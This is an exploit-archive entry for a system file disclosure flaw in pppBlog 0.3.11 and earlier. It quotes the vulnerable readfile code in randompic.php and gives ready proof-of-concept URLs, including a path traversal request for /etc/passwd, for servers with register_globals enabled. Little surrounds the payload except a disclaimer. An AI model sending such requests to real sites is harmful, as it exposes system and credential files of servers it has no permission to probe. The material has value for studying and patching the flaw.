pppBlog <= 0.3.11 (randompic.php) File Disclosure Vulnerability

2008-11-03T00:00:00
ID 1337DAY-ID-4049
Type zdt
Reporter JosS
Modified 2008-11-03T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
pppBlog <= 0.3.11 (randompic.php) File Disclosure Vulnerability
===============================================================

# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
# url: http://sourceforge.net/projects/pppblog/
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# In memory of rgod ;)

*Requeriments: register_globals = On

vulnerable code in randompic.php at lines 66-72:
...
header("Content-Type: image/gif");
header("Content-Transfer-Encoding: binary");
if (is_array($files)){
    if (is_file($files[$randnum])){
	readfile("$dir/$files[$randnum]");
    }
}
...

poc[0] = randompic.php?files[0]=[file]
poc[1] = randompic.php?files[0]=../../../../../../../../../../etc/passwd


tested on localhost with register_globals = On.

Hack0wn :D



#  0day.today [2018-04-12]  #